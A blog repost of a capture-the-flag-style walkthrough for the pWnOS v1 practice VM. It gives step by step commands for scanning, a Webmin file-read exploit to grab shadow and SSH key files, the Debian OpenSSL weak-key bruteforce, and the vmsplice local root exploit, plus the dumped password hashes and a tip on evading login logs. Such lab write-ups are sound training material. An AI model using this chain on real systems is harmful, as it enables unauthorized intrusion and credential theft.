Samiux's Blog

Open Source is a great idea and it has changed the world! Open Source forever ....

While you do not know attack, how can you know about defense? (未知攻,焉知防?)

Do BAD things .... for the RIGHT reasons -- OWASP ZAP

It is easier to port a shell than a shell script. -- Larry Wall

Most of you are familiar with the virtues of a programmer. There are three, of course: laziness, impatience, and hubris. -- Larry Wall

为天地立心，为生民立命，为往圣继绝学，为万世开太平。 -- 王炜

Sunday, September 11, 2011

HOWTO : pWnOS

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

What is this?

This is my walk though of how I broke into pWnOS v1.

pWnOS is on a "VM Image", that creates a target on which to practice penetration testing; with the "end goal" is to get root. It was designed to practice using exploits, with multiple entry points

Scenario

A company dedicated to serving Webhosting hires you to perform a penetration test on one of its servers dedicated to the administration of their systems.

It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t.

What do I need?

BackTrack 4 (Final)
pWnOS.vmdk
exploit-db.com or milw0rm.

Software
Name: pWnOS
Version: 1
Home Page: http://0dayclub.com/files/pWnOS%20v1.0.zip

Download Link:

http://www.mediafire.com/file/ec3hmlzuyzy/pWnOS v1.0.part1.rar
http://www.mediafire.com/file/yngwzqkxmin/pWnOS v1.0.part2.rar
http://www.mediafire.com/file/htmqm3dzgya/pWnOS v1.0.part3.rar

http://www.0dayclub.com/public/index...nOS%20v1.0.zip
http://krash.in/bond00/new/pWnOS%20v1.0.zip
http://0dayclub.com/files/pWnOS%20v1.0.zip

Forum/Support: http://forums.heorot.net/viewforum.php?f=21

Commands

nmap 192.168.3.1-255



nmap -sV -sS -O 192.168.3.100



firefox http://192.168.3.100



firefox http://192.168.3.100:10000





firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php

*Webmin <> save. Filename: shadow



firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb

*Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*

http://milw0rm.com/exploits/5622        (perl)

http://milw0rm.com/exploits/5720        (python)

http://milw0rm.com/exploits/5632        (ruby)

http://www.exploit-db.com/exploits/5622 (perl)

http://www.exploit-db.com/exploits/5720 (python)

http://www.exploit-db.com/exploits/5632 (ruby)



wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2



perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys

perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys

perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys

perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys



tar jxvf debian_ssh_rsa_2048_x86.tar.bz



cd rsa/2048



grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub

grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub

*scans for the public key...*



ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100

exit



ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100

hostname

uname -a



firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c

*Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*

http://milw0rm.com/exploits/5092         (c)

http://www.exploit-db.com/exploits/5092  (c)



nano vmsplice.c



gcc vmsplice.c -o vmsplice



./vmsplice



whoami



----------------------------------------------------------------------------------------------------

Users

root:          root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::

vmware:        vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::

obama:         obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::

osama:         osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::

yomama:        yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

----------------------------------------------------------------------------------------------------

Notes

I had problems with the Debian OpenSSH/OpenSSL exploit, some times it would work, else it would be really slow or just cant find the correct exploit file. The method which I use, turns it into a offline attack, which makes it more stealthy as it will not log failed logins (e.g. /var/auth/auth.log. See here for reading it). It relies on the default path tho!

This is one method of getting in, the author did say that there is multiple ways in!

It took me a bit of work to also to get it to work with virtual box & static IP addresses.

That's all! See you.